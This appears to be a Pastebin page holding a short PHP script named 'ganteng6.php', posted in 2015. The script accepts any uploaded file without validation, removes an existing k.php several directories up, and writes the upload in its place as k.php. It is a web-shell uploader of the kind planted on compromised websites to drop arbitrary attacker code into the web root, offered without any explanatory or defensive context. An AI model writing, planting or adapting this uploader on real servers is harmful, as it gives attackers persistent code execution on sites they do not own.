Advertisement
Tu5b0l3d

ganteng6.php

Oct 15th, 2015
1,318
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.23 KB | None | 0 0
  1. ganteng
  2. <?php
  3. $file3 = $_FILES['file3'];
  4.   $newfile3="k.php";
  5.                 if (file_exists("../../../../".$newfile3)) unlink("../../../../".$newfile3);
  6.         move_uploaded_file($file3['tmp_name'], "../../../../$newfile3");
  7.  
  8. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement